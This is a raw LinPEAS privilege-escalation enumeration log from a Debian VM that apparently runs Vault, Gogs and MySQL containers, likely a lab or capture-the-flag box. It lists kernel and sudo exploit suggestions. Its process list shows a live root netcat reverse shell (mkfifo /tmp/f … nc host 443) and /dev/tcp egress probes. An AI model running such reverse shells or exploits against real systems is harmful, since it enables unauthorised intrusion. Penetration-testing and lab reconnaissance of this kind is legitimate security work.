═══════════════════════════════╣ Basic information ╠═══════════════════════════════

╚═══════════════════╝
OS: Linux version 6.1.0-12-amd64 (debian-kernel@[Link]) (gcc-12 (Debian
12.2.0-14) 12.2.0, GNU ld (GNU Binutils for Debian) 2.40) #1 SMP PREEMPT_DYNAMIC
Debian 6.1.52-1 (2023-09-07)
User & Groups: uid=1001(gilfoyle) gid=1001(gilfoyle) groups=1001(gilfoyle)
Hostname: [Link]

[+] /bin/ping is available for network discovery (LinPEAS can discover hosts, learn
more with -h)
[+] /bin/bash is available for network discovery, port scanning and port forwarding
(LinPEAS can discover hosts, scan ports, and forward ports. Learn more with -h)

Caching directories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
. . . . . . . . . . . DONE

╔════════════════════╗
══════════════════════════════╣ System Information ╠══════════════════════════════
╚════════════════════╝
╔══════════╣ Operative system
╚ [Link]
[Link]#kernel-exploits
Linux version 6.1.0-12-amd64 (debian-kernel@[Link]) (gcc-12 (Debian
12.2.0-14) 12.2.0, GNU ld (GNU Binutils for Debian) 2.40) #1 SMP PREEMPT_DYNAMIC
Debian 6.1.52-1 (2023-09-07)
Distributor ID: Debian
Description: Debian GNU/Linux 9.7 (stretch)
Release: 9.7
Codename: stretch

╔══════════╣ Sudo version

sudo Not Found

╔══════════╣ PATH
╚ [Link]
[Link]#writable-path-abuses
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games

╔══════════╣ Date & uptime

Sun Nov 30 [Link] EST 2025
[Link] up 3:01, 1 user, load average: 0.70, 0.20, 0.07

╔══════════╣ Unmounted file-system?

╚ Check if you can mount umounted devices
UUID=c8eb8ae3-1520-4599-b5f0-951dbbacd46a / ext4 errors=remount-ro
0 1
UUID=6ef792f3-2a5c-426c-bf3e-a3da60d2d9a5 none swap sw 0
0
/dev/sr0 /media/cdrom0 udf,iso9660 user,noauto 0 0

╔══════════╣ Any sd*/disk* disk in /dev? (limit 20)

disk
sda
sda1
sda2
sda5
╔══════════╣ Environment
╚ Any private information inside environment variables?
MAIL=/var/mail/gilfoyle
USER=gilfoyle
SSH_CLIENT=[Link] 60846 22
VAULT_ADDR=[Link]
SHLVL=1
HOME=/home/gilfoyle
SSH_TTY=/dev/pts/0
LOGNAME=gilfoyle
_=./[Link]
TERM=xterm-256color
XDG_RUNTIME_DIR=/run/user/1001
LANG=en_US.UTF-8
SHELL=/bin/bash
PWD=/home/gilfoyle
SSH_CONNECTION=[Link] 60846 [Link] 22

╔══════════╣ Searching Signature verification failed in dmesg

╚ [Link]
[Link]#dmesg-signature-verification-failed
dmesg Not Found

╔══════════╣ Executing Linux Exploit Suggester

╚ [Link]
[+] [CVE-2021-4034] PwnKit

Details: [Link]
Exposure: probable
Tags: ubuntu=10|11|12|13|14|15|16|17|18|19|20|21,[ debian=7|8|9|10|
11 ],fedora,manjaro
Download URL: [Link]

[+] [CVE-2018-1000001] RationalLove

Details: [Link]
Exposure: probable
Tags: [ debian=9 ]{libc6:2.24-11+deb9u1},ubuntu=16.04.3{libc6:2.23-0ubuntu9}
Download URL:
[Link]
Comments: kernel.unprivileged_userns_clone=1 required

[+] [CVE-2022-2586] nft_object UAF

Details: [Link]
Exposure: less probable
Tags: ubuntu=(20.04){kernel:5.12.13}
Download URL: [Link]
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)

[+] [CVE-2021-3156] sudo Baron Samedit

Details: [Link]
[Link]
Exposure: less probable
Tags: mint=19,ubuntu=18|20, debian=10
Download URL: [Link]

[+] [CVE-2021-3156] sudo Baron Samedit 2

 Details: [Link]
[Link]
Exposure: less probable
Tags: centos=6|7|8,ubuntu=14|16|17|18|19|20, debian=9|10
Download URL: [Link]

[+] [CVE-2021-22555] Netfilter heap out-of-bounds write

Details: [Link]
[Link]
Exposure: less probable
Tags: ubuntu=20.04{kernel:5.8.0-*}
Download URL:
[Link]
2021-22555/exploit.c
ext-url: [Link]
2021-22555/exploit.c
Comments: ip_tables kernel module must be loaded

[+] [CVE-2019-18634] sudo pwfeedback

Details: [Link]
Exposure: less probable
Tags: mint=19
Download URL:
[Link]
Comments: sudo configuration requires pwfeedback to be enabled.

[+] [CVE-2017-1000366,CVE-2017-1000379] linux_ldso_hwcap_64

Details: [Link]
Exposure: less probable
Tags: debian=7.7|8.5|9.0,ubuntu=14.04.2|16.04.2|17.04,fedora=22|
25,centos=7.3.1611
Download URL:
[Link]
Comments: Uses "Stack Clash" technique, works against most SUID-root binaries

╔══════════╣ Protections
═╣ AppArmor enabled? .............. AppArmor Not Found
═╣ AppArmor profile? .............. unconfined
═╣ is linuxONE? ................... s390x Not Found
═╣ grsecurity present? ............ grsecurity Not Found
═╣ PaX bins present? .............. PaX Not Found
═╣ Execshield enabled? ............ Execshield Not Found
═╣ SELinux enabled? ............... sestatus Not Found
═╣ Seccomp enabled? ............... disabled
═╣ User namespace? ................ enabled
═╣ Cgroup2 enabled? ............... enabled
═╣ Is ASLR enabled? ............... Yes
═╣ Printer? ....................... No
═╣ Is this a virtual machine? ..... Yes (vmware)

╔══════════╣ Kernel Modules Information

══╣ Kernel modules with weak perms?

══╣ Kernel modules loadable?

Modules can be loaded

╔═══════════╗
═══════════════════════════════════╣ Container ╠═══════════════════════════════════
╚═══════════╝
╔══════════╣ Container related tools present (if any):
/usr/bin/docker
/usr/bin/runc
/usr/bin/ctr
/usr/bin/containerd
/usr/local/bin/docker-compose
/usr/bin/docker-proxy
/usr/bin/nsenter
/usr/bin/unshare
/usr/sbin/chroot
/sbin/capsh
/sbin/setcap
/sbin/getcap

╔══════════╣ Container details

═╣ Is this a container? ........... No
═╣ Docker version ............... Client: Docker Engine - Community
Version: 19.03.15
API version: 1.40
Go version: go1.13.15
Git commit: 99e3ed8919
Built: Sat Jan 30 [Link] 2021
OS/Arch: linux/amd64
Experimental: false
docker Not Found
═╣ Docker info ................. Client:
Debug Mode: false

Server:
ERROR: Got permission denied while trying to connect to the Docker daemon socket at
unix:///var/run/[Link]: Get [Link] dial
unix /var/run/[Link]: connect: permission denied
docker Not Found
═╣ Any running containers? ........ No

╔═══════╗
═════════════════════════════════════╣ Cloud ╠═════════════════════════════════════
╚═══════╝
Learn and practice cloud hacking techniques in [Link]

═╣ GCP Virtual Machine? ................. No

═╣ GCP Cloud Funtion? ................... No
═╣ AWS ECS? ............................. No
═╣ AWS EC2? ............................. No
═╣ AWS EC2 Beanstalk? ................... No
═╣ AWS Lambda? .......................... No
═╣ AWS Codebuild? ....................... No
═╣ DO Droplet? .......................... No
═╣ IBM Cloud VM? ........................ No
═╣ Azure VM or Az metadata? ............. No
═╣ Azure APP or IDENTITY_ENDPOINT? ...... No
═╣ Azure Automation Account? ............ No
═╣ Aliyun ECS? .......................... No
═╣ Tencent CVM? ......................... No

╔════════════════════════════════════════════════╗
════════════════╣ Processes, Crons, Timers, Services and Sockets ╠════════════════
╚════════════════════════════════════════════════╝
╔══════════╣ Running processes (cleaned)
╚ Check weird & unexpected processes run by root:
[Link]
[Link]#processes
root 1 0.0 0.3 57004 6812 ? Ss 05:13 0:00 /sbin/init
root 311 0.0 0.3 51156 6084 ? Ss 05:13 0:00
/lib/systemd/systemd-journald
root 312 0.0 0.6 214192 13520 ? Ssl 05:13 0:09 /usr/bin/vmtoolsd
root 344 0.0 0.2 47300 4852 ? Ss 05:13 0:00
/lib/systemd/systemd-udevd
systemd+ 387 0.0 0.3 127300 6156 ? Ssl 05:13 0:00
/lib/systemd/systemd-timesyncd
└─(Caps) 0x0000000002000000=cap_sys_time
root 508 0.0 0.2 250124 5044 ? Ssl 05:13 0:00 /usr/sbin/rsyslogd
-n
root 509 0.0 0.9 153536 18308 ? Ss 05:13 0:00
/usr/bin/VGAuthService
root 511 0.0 0.1 29644 2768 ? Ss 05:13 0:00 /usr/sbin/cron -f
root 512 0.0 0.2 46436 4864 ? Ss 05:13 0:00
/lib/systemd/systemd-logind
message+ 513 0.0 0.1 45180 3948 ? Ss 05:13 0:00 /usr/bin/dbus-
daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
└─(Caps) 0x0000000020000000=cap_audit_write
root 583 0.0 0.1 20496 2940 ? Ss 05:13 0:00 /sbin/dhclient -4
-v -pf /run/[Link] -lf /var/lib/dhcp/[Link] -I -df
/var/lib/dhcp/[Link] eth0
root 629 0.0 0.0 14544 1712 tty1 Ss+ 05:13 0:00 /sbin/agetty --
noclear tty1 linux
root 634 0.0 3.0 692136 62248 ? Ssl 05:13 0:08
/usr/bin/containerd
root 1021 0.0 0.5 108824 10976 ? Sl 05:14 0:00 _ containerd-shim
-namespace moby -workdir
/var/lib/containerd/[Link]/moby/47a81a3348a99bbc3bc112b6fc1
2fb85211e59c152d385c52fb3d9310e112906 -address /run/containerd/[Link] -
containerd-binary /usr/bin/containerd -runtime-root /var/run/docker/runtime-runc
root 1038 0.2 4.0 82512 81056 ? SLsl 05:14 0:30 | _ vault
server -config /vault/config/[Link]
root 1131 0.0 0.6 110232 12596 ? Sl 05:14 0:00 _ containerd-shim
-namespace moby -workdir
/var/lib/containerd/[Link]/moby/82cbcaeb4fb97d3dd2b3d46a76c
fa670a3cf2bf2735544b38f4cd8be7df895a0 -address /run/containerd/[Link] -
containerd-binary /usr/bin/containerd -runtime-root /var/run/docker/runtime-runc
root 1148 0.0 1.6 35228 32776 ? Ss 05:14 0:02 | _ python
./[Link]
root 1238 0.0 0.6 108824 12540 ? Sl 05:14 0:00 _ containerd-shim
-namespace moby -workdir
/var/lib/containerd/[Link]/moby/eac0517a7e2cbe67d8a5b4a2961
7bcada68e5b4d26428ff5893a0b424a15d376 -address /run/containerd/[Link] -
containerd-binary /usr/bin/containerd -runtime-root /var/run/docker/runtime-runc
999 1255 0.5 21.9 1826400 442984 ? Ssl 05:14 0:54 | _ mysqld
root 1353 0.0 0.6 108824 13644 ? Sl 05:14 0:00 _ containerd-shim
-namespace moby -workdir
/var/lib/containerd/[Link]/moby/a9051fdd79e704d48a34e8ad973
812a131db055bef1016be44d2ac4782794530 -address /run/containerd/[Link] -
containerd-binary /usr/bin/containerd -runtime-root /var/run/docker/runtime-runc
root 1372 0.0 0.0 1068 484 ? Ss 05:14 0:00 | _ /bin/s6-
svscan /app/gogs/docker/s6/
root 1475 0.0 0.0 1072 520 ? S 05:14 0:00 | _ s6-
supervise crond
root 1476 0.0 0.0 1072 496 ? S 05:14 0:00 | _ s6-
supervise gogs
1000 1824 0.0 2.8 130724 58248 ? Ssl 05:14 0:03 | | _
/app/gogs/gogs web
root 1477 0.0 0.0 1072 416 ? S 05:14 0:00 | _ s6-
supervise syslogd
root 1480 0.0 0.0 1528 4 ? Ss 05:14 0:00 | | _
/sbin/syslogd -nS -O-
root 1478 0.0 0.0 1072 452 ? S 05:14 0:00 | _ s6-
supervise openssh
root 1479 0.0 0.1 4288 2916 ? Ss 05:14 0:00 | _
/usr/sbin/sshd -D -f /app/gogs/docker/sshd_config
root 1518 0.0 0.6 110232 12472 ? Sl 05:14 0:00 _ containerd-shim
-namespace moby -workdir
/var/lib/containerd/[Link]/moby/5a3d243127f5cfeb97bc6332eda
2e4ceae19472421c0c5a7d226fb5fc1ef0f7c -address /run/containerd/[Link] -
containerd-binary /usr/bin/containerd -runtime-root /var/run/docker/runtime-runc
root 1536 0.0 2.2 48232 45192 ? Ssl 05:14 0:03 | _ python
./[Link]
root 17410 0.0 0.0 1592 1080 ? S 07:18 0:00 | _ sh -c
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [Link] 443 >/tmp/f
root 17413 0.0 0.0 1540 4 ? S 07:18 0:00 | _ cat
/tmp/f
root 17414 0.0 0.0 1592 924 ? S 07:18 0:00 | _
/bin/sh -i
root 17415 0.0 0.0 1544 4 ? S 07:18 0:00 | _ nc
[Link] 443
root 1674 0.0 0.6 108824 12592 ? Sl 05:14 0:02 _ containerd-shim
-namespace moby -workdir
/var/lib/containerd/[Link]/moby/161f4d385ed0a3b8382aa28e788
3980d6b40b61e38899a5af8e34862289471d1 -address /run/containerd/[Link] -
containerd-binary /usr/bin/containerd -runtime-root /var/run/docker/runtime-runc
root 1708 0.0 0.3 36876 6192 ? Ss 05:14 0:00 _ nginx:
master process nginx -g daemon[0m off;
root 1802 0.5 0.3 37492 6220 ? S 05:14 1:01 _ nginx:
worker process
root 636 0.0 0.3 69968 6224 ? Ss 05:13 0:00 /usr/sbin/sshd -D
gilfoyle 20977 0.0 0.2 101400 4632 ? S 08:06 0:00 _ sshd:
gilfoyle@pts/0
gilfoyle 20978 0.0 0.2 21192 5200 pts/0 Ss 08:06 0:00 _ -bash
gilfoyle 17455 0.4 0.1 5108 2508 pts/0 S+ 08:14 0:00 _
/bin/sh ./[Link]
gilfoyle 20716 0.0 0.0 5108 988 pts/0 S+ 08:14 0:00 _
/bin/sh ./[Link]
gilfoyle 20720 0.0 0.1 38636 3676 pts/0 R+ 08:14 0:00 |
_ ps fauxwww
gilfoyle 20719 0.0 0.0 5108 988 pts/0 S+ 08:14 0:00 _
/bin/sh ./[Link]
root 700 0.1 4.9 537000 99568 ? Ssl 05:13 0:11 /usr/bin/dockerd -
H fd:// --containerd=/run/containerd/[Link]
root 1346 0.0 0.5 216880 11660 ? Sl 05:14 0:00 _
/usr/bin/docker-proxy -proto tcp -host-ip [Link] -host-port 6022 -container-ip
[Link] -container-port 6022
root 1649 0.0 0.5 225076 11704 ? Sl 05:14 0:00 _
/usr/bin/docker-proxy -proto tcp -host-ip [Link] -host-port 443 -container-ip
[Link] -container-port 443
root 1664 0.0 0.5 298808 11764 ? Sl 05:14 0:00 _
/usr/bin/docker-proxy -proto tcp -host-ip [Link] -host-port 80 -container-ip
[Link] -container-port 80
gilfoyle 20970 0.0 0.3 65004 6528 ? Ss 08:06 0:00
/lib/systemd/systemd --user
gilfoyle 20971 0.0 0.0 84588 1640 ? S 08:06 0:00 _ (sd-pam)
gilfoyle 10280 0.0 0.1 91616 3144 ? SLs 08:14 0:00 _ /usr/bin/gpg-
agent --supervised
systemd+ 8380 0.0 0.2 49636 4168 ? Ss 08:14 0:00
/lib/systemd/systemd-resolved
gilfoyle 8464 0.0 0.0 11176 252 pts/0 S 08:14 0:00 bash -c (echo
>/dev/tcp/[Link]/80 2>/dev/null && echo "Port 80 is accessible" && exit 0)
2>/dev/null || echo "Port 80 is not accessible"
gilfoyle 8468 0.0 0.1 11184 2252 pts/0 S 08:14 0:00 bash -c ((( echo
cfc9 0100 0001 0000 0000 0000 0a64 7563 6b64 7563 6b67 6f03 636f 6d00 0001 0001 |
xxd -p -r >&3; dd bs=9000 count=1 <&3 2>/dev/null | xxd ) 3>/dev/udp/[Link]/53 &&
echo "DNS accessible") | grep "accessible" && exit 0 ) 2>/dev/null || echo "DNS is
not accessible"
gilfoyle 8469 0.0 0.0 11184 268 pts/0 S 08:14 0:00 _ bash -c
((( echo cfc9 0100 0001 0000 0000 0000 0a64 7563 6b64 7563 6b67 6f03 636f 6d00 0001
0001 | xxd -p -r >&3; dd bs=9000 count=1 <&3 2>/dev/null | xxd )
3>/dev/udp/[Link]/53 && echo "DNS accessible") | grep "accessible" && exit 0 )
2>/dev/null || echo "DNS is not accessible"
gilfoyle 8472 0.0 0.1 11184 2380 pts/0 S 08:14 0:00 | _ bash -c (((
echo cfc9 0100 0001 0000 0000 0000 0a64 7563 6b64 7563 6b67 6f03 636f 6d00 0001
0001 | xxd -p -r >&3; dd bs=9000 count=1 <&3 2>/dev/null | xxd )
3>/dev/udp/[Link]/53 && echo "DNS accessible") | grep "accessible" && exit 0 )
2>/dev/null || echo "DNS is not accessible"
gilfoyle 8486 0.0 0.0 5888 660 pts/0 S 08:14 0:00 | _ dd
bs=9000 count=1
gilfoyle 8487 0.0 0.0 4200 616 pts/0 S 08:14 0:00 | _ xxd
gilfoyle 8470 0.0 0.0 12792 960 pts/0 S 08:14 0:00 _ grep accessible
gilfoyle 8480 0.0 0.0 11176 248 pts/0 S 08:14 0:00 bash -c (echo
>/dev/tcp/[Link]/443 2>/dev/null && echo "Port 443 is accessible" && exit 0)
2>/dev/null || echo "Port 443 is not accessible"

╔══════════╣ Processes with unusual configurations

╔══════════╣ Processes with credentials in memory (root req)

╚ [Link]
[Link]#credentials-from-process-memory
gdm-password Not Found
gnome-keyring-daemon Not Found
lightdm Not Found
vsftpd Not Found
apache2 Not Found
sshd: process found (dump creds from memory as root)
mysql process found (dump creds from memory as root)
postgres Not Found
redis-server Not Found
mongod Not Found
memcached Not Found
elasticsearch Not Found
jenkins Not Found
tomcat Not Found
nginx process found (dump creds from memory as root)
php-fpm Not Found
supervisord Not Found
vncserver Not Found
xrdp Not Found
teamviewer Not Found

╔══════════╣ Opened Files by processes

Process 8464 (gilfoyle) - bash -c (echo >/dev/tcp/[Link]/80 2>/dev/null &&
echo "Port 80 is accessible" && exit 0) 2>/d
└─ Has open files:
└─ /dev/pts/0
Process 8468 (gilfoyle) - bash -c ((( echo cfc9 0100 0001 0000 0000 0000 0a64 7563
6b64 7563 6b67 6f03 636f 6d00 0001 0001 | x
└─ Has open files:
└─ /dev/pts/0
Process 8469 (gilfoyle) - bash -c ((( echo cfc9 0100 0001 0000 0000 0000 0a64 7563
6b64 7563 6b67 6f03 636f 6d00 0001 0001 | x
└─ Has open files:
└─ pipe:[275738]
Process 8470 (gilfoyle) - grep accessible
└─ Has open files:
└─ pipe:[275738]
└─ /dev/pts/0
Process 8472 (gilfoyle) - bash -c ((( echo cfc9 0100 0001 0000 0000 0000 0a64 7563
6b64 7563 6b67 6f03 636f 6d00 0001 0001 | x
└─ Has open files:
└─ pipe:[275738]
Process 8480 (gilfoyle) - bash -c (echo >/dev/tcp/[Link]/443 2>/dev/null &&
echo "Port 443 is accessible" && exit 0) 2>
└─ Has open files:
└─ /dev/pts/0
Process 8486 (gilfoyle) - dd bs=9000 count=1
└─ Has open files:
└─ pipe:[275745]
Process 8487 (gilfoyle) - xxd
└─ Has open files:
└─ pipe:[275745]
└─ pipe:[275738]
Process 20970 (gilfoyle) - /lib/systemd/systemd --user
└─ Has open files:
└─ /proc/20970/mountinfo
└─ /proc/swaps
└─ /sys/fs/cgroup/systemd/[Link]/[Link]/user@[Link]
Process 20978 (gilfoyle) - -bash
└─ Has open files:
└─ /dev/pts/0

╔══════════╣ Processes with memory-mapped credential files

╔══════════╣ Processes whose PPID belongs to a different user (not root)

╚ You will know if a user can somehow spawn processes as a different user

╔══════════╣ Files opened by processes belonging to other users

╚ This is usually empty because of the lack of privileges to read other user
processes information
╔══════════╣ Check for vulnerable cron jobs
╚ [Link]
[Link]#scheduledcron-jobs
══╣ Cron jobs list
/usr/bin/crontab
incrontab Not Found
-rw-r--r-- 1 root root 722 Oct 7 2017 /etc/crontab

/etc/cron.d:
total 12
drwxr-xr-x 2 root root 4096 Nov 16 2023 .
drwxr-xr-x 80 root root 4096 Nov 30 08:15 ..
-rw-r--r-- 1 root root 102 Oct 7 2017 .placeholder

/etc/[Link]:
total 36
drwxr-xr-x 2 root root 4096 Nov 16 2023 .
drwxr-xr-x 80 root root 4096 Nov 30 08:15 ..
-rwxr-xr-x 1 root root 1474 Sep 13 2017 apt-compat
-rwxr-xr-x 1 root root 355 Oct 25 2016 bsdmainutils
-rwxr-xr-x 1 root root 1597 Jun 25 2018 dpkg
-rwxr-xr-x 1 root root 89 May 5 2015 logrotate
-rwxr-xr-x 1 root root 1065 Dec 13 2016 man-db
-rwxr-xr-x 1 root root 249 May 17 2017 passwd
-rw-r--r-- 1 root root 102 Oct 7 2017 .placeholder

/etc/[Link]:
total 12
drwxr-xr-x 2 root root 4096 Nov 16 2023 .
drwxr-xr-x 80 root root 4096 Nov 30 08:15 ..
-rw-r--r-- 1 root root 102 Oct 7 2017 .placeholder

/etc/[Link]:
total 12
drwxr-xr-x 2 root root 4096 Nov 16 2023 .
drwxr-xr-x 80 root root 4096 Nov 30 08:15 ..
-rw-r--r-- 1 root root 102 Oct 7 2017 .placeholder

/etc/[Link]:
total 16
drwxr-xr-x 2 root root 4096 Nov 16 2023 .
drwxr-xr-x 80 root root 4096 Nov 30 08:15 ..
-rwxr-xr-x 1 root root 723 Dec 13 2016 man-db
-rw-r--r-- 1 root root 102 Oct 7 2017 .placeholder

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

17 * * * * root cd / && run-parts --report /etc/[Link]

25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --
report /etc/[Link] )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --
report /etc/[Link] )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --
report /etc/[Link] )

══╣ Checking for specific cron jobs vulnerabilities

Checking cron directories...
╔══════════╣ System timers
╚ [Link]
[Link]#timers
══╣ Active timers:
NEXT LEFT LAST PASSED
UNIT ACTIVATES
Sun 2025-11-30 [Link] EST 8h left Sun 2025-11-30 [Link] EST 3h 1min ago
[Link] [Link]
Mon 2025-12-01 [Link] EST 21h left Sun 2025-11-30 [Link] EST 2h 46min ago
[Link] [Link]
Mon 2025-12-01 [Link] EST 22h left Sun 2025-11-30 [Link] EST 2h 5min ago
[Link] [Link]
══╣ Disabled timers:
══╣ Additional timer files:

╔══════════╣ Services and Service Files

╚ [Link]
[Link]#services

══╣ Active services:

[Link] loaded active exited Set console font and
keymap
[Link] loaded active running containerd container
runtime
./[Link]: 3944: local: /usr/bin/containerd: bad variable name
Not Found

══╣ Disabled services:

[Link] disabled
[Link] disabled
[Link] disabled
[Link] disabled
serial-getty@.service disabled
[Link] disabled
[Link] disabled
[Link] disabled
8 unit files listed.

══╣ Additional service files:

./[Link]: 3944: local: /usr/bin/containerd: bad variable name
You can't write on systemd PATH

╔══════════╣ Systemd Information

╚ [Link]
[Link]#systemd-path---relative-paths
═╣ Systemd version and vulnerabilities? .............. ═╣ Services running as root?
.....
═╣ Running services with dangerous capabilities? ...
═╣ Services with writable paths? . [Link]: Uses relative path 'overlay'
(from ExecStartPre=-/sbin/modprobe overlay)
[Link]: Uses relative path '-n' (from ExecStart=/usr/sbin/rsyslogd -n)

╔══════════╣ Systemd PATH

╚ [Link]
[Link]#systemd-path---relative-paths
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

╔══════════╣ Analyzing .socket files

╚ [Link]
[Link]#sockets
./[Link]: 4207: local: /run/systemd/journal/socket: bad variable name

╔══════════╣ Unix Sockets Analysis

╚ [Link]
[Link]#sockets
/run/containerd/[Link]
/run/containerd/[Link]
/run/dbus/system_bus_socket
└─(Read Write (Weak Permissions: 666) )
└─(Owned by root)
/run/[Link]
/run/systemd/cgroups-agent
/run/systemd/[Link]
/run/systemd/journal/dev-log
└─(Read Write (Weak Permissions: 666) )
└─(Owned by root)
/run/systemd/journal/socket
└─(Read Write (Weak Permissions: 666) )
└─(Owned by root)
/run/systemd/journal/stdout
└─(Read Write (Weak Permissions: 666) )
└─(Owned by root)
/run/systemd/journal/syslog
└─(Read Write (Weak Permissions: 666) )
└─(Owned by root)
/run/systemd/notify
└─(Read Write Execute (Weak Permissions: 777) )
└─(Owned by root)
/run/systemd/private
└─(Read Write Execute (Weak Permissions: 777) )
└─(Owned by root)
/run/udev/control
/run/user/1001/gnupg/[Link]-agent
└─(Read Write )
/run/user/1001/gnupg/[Link]
└─(Read Write )
/run/user/1001/gnupg/[Link]
└─(Read Write )
/run/user/1001/gnupg/[Link]
└─(Read Write )
/run/user/1001/systemd/notify
└─(Read Write Execute )
/run/user/1001/systemd/private
└─(Read Write Execute )
/run/vmware/guestServicePipe
└─(Read Write (Weak Permissions: 666) )
└─(Owned by root)
/var/run/dbus/system_bus_socket
└─(Read Write (Weak Permissions: 666) )
└─(Owned by root)
/var/run/[Link]
/var/run/vmware/guestServicePipe
└─(Read Write (Weak Permissions: 666) )
└─(Owned by root)

╔══════════╣ D-Bus Analysis

╚ [Link]
[Link]#d-bus
NAME PID PROCESS USER
CONNECTION UNIT SESSION DESCRIPTION
:1.0 1 systemd root :1.0
[Link] - -
:1.1 512 systemd-logind root :1.1
[Link] - -
:1.109 8380 systemd-resolve systemd-resolve :1.109
[Link] - -
:1.204 6766 busctl gilfoyle :1.204
[Link] 179 -
[Link] - - -
(activatable) - -
[Link] 513 dbus-daemon[0m messagebus
[Link] [Link] - -
[Link] - - -
(activatable) - -
[Link].PolicyKit1 - - -
(activatable) - -
[Link].hostname1 - - -
(activatable) - -
[Link].locale1 - - -
(activatable) - -
[Link].login1 512 systemd-logind root :1.1
[Link] - -
[Link].network1 - - -
(activatable) - -
[Link].resolve1 8380 systemd-resolve systemd-resolve :1.109
[Link] - -
[Link].systemd1 1 systemd root :1.0
[Link] - -
[Link].timedate1 - - -
(activatable) - -

╔══════════╣ D-Bus Configuration Files

Analyzing /etc/dbus-1/system.d/[Link]:
└─(Allow rules in default context)
└─ <allow send_destination="[Link]"
<allow send_destination="[Link]"
<allow send_destination="[Link]"
Analyzing /etc/dbus-1/system.d/[Link]:
└─(Allow rules in default context)
└─ <allow send_destination="[Link]"
<allow send_destination="[Link]"
<allow send_destination="[Link]"
Analyzing /etc/dbus-1/system.d/[Link]:
└─(Allow rules in default context)
└─ <allow send_destination="[Link].PolicyKit1"/>
Analyzing /etc/dbus-1/system.d/[Link]:
└─(Allow rules in default context)
└─ <allow
send_destination="[Link].hostname1"/>
<allow receive_sender="[Link].hostname1"/>
Analyzing /etc/dbus-1/system.d/[Link]:
└─(Allow rules in default context)
└─ <allow send_destination="[Link].locale1"/>
<allow receive_sender="[Link].locale1"/>
Analyzing /etc/dbus-1/system.d/[Link]:
└─(Allow rules in default context)
 └─ <allow send_destination="[Link].login1"
Analyzing /etc/dbus-1/system.d/[Link]:
└─(Weak user policy found)
└─ <policy user="systemd-network">
└─(Allow rules in default context)
└─ <allow send_destination="[Link].network1"
Analyzing /etc/dbus-1/system.d/[Link]:
└─(Weak user policy found)
└─ <policy user="systemd-resolve">
└─(Allow rules in default context)
└─ <allow
send_destination="[Link].resolve1"/>
<allow receive_sender="[Link].resolve1"/>
Analyzing /etc/dbus-1/system.d/[Link]:
└─(Allow rules in default context)
└─ <allow send_destination="[Link].systemd1"
Analyzing /etc/dbus-1/system.d/[Link]:
└─(Allow rules in default context)
└─ <allow
send_destination="[Link].timedate1"/>
<allow receive_sender="[Link].timedate1"/>

══╣ D-Bus Session Bus Analysis

(Access to session bus available)

╔══════════╣ Legacy r-commands (rsh/rlogin/rexec) and host-based trust

══╣ Listening r-services (TCP 512-514)

══╣ systemd units exposing r-services

rlogin|rsh|rexec units Not Found

══╣ inetd/xinetd configuration for r-services

/etc/[Link] Not Found
/etc/xinetd.d Not Found

══╣ Installed r-service server packages

No related packages found via dpkg

══╣ /etc/[Link] and /etc/[Link]

══╣ Per-user .rhosts files

.rhosts Not Found

══╣ PAM rhosts authentication

/etc/pam.d/rlogin|rsh Not Found

══╣ SSH HostbasedAuthentication

HostbasedAuthentication no or not set

══╣ Potential DNS control indicators (local)

Not detected

╔══════════╣ Crontab UI (root) misconfiguration checks

╚ [Link]
[Link]#scheduledcron-jobs
crontab-ui Not Found
 ╔═════════════════════╗
══════════════════════════════╣ Network Information ╠══════════════════════════════
╚═════════════════════╝
╔══════════╣ Interfaces
default [Link]
loopback [Link]
link-local [Link]

br-2126e7722b3e: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500

inet [Link] netmask [Link] broadcast [Link]
inet6 fe80::42:7ff:fe3e:4a30 prefixlen 64 scopeid 0x20<link>
ether [Link] txqueuelen 0 (Ethernet)
RX packets 262156 bytes 53586848 (51.1 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 308094 bytes 92686417 (88.3 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

br-26e562541429: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500

inet [Link] netmask [Link] broadcast [Link]
ether [Link] txqueuelen 0 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

br-6d19c883b122: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500

inet [Link] netmask [Link] broadcast [Link]
ether [Link] txqueuelen 0 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

docker0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500

inet [Link] netmask [Link] broadcast [Link]
ether [Link] txqueuelen 0 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500

inet [Link] netmask [Link] broadcast [Link]
inet6 fe80::250:56ff:feb0:3e4a prefixlen 64 scopeid 0x20<link>
inet6 [Link] prefixlen 64 scopeid 0x0<global>
ether [Link] txqueuelen 1000 (Ethernet)
RX packets 334151 bytes 95667630 (91.2 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 266860 bytes 57612468 (54.9 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536

inet [Link] netmask [Link]
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 30 bytes 2862 (2.7 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
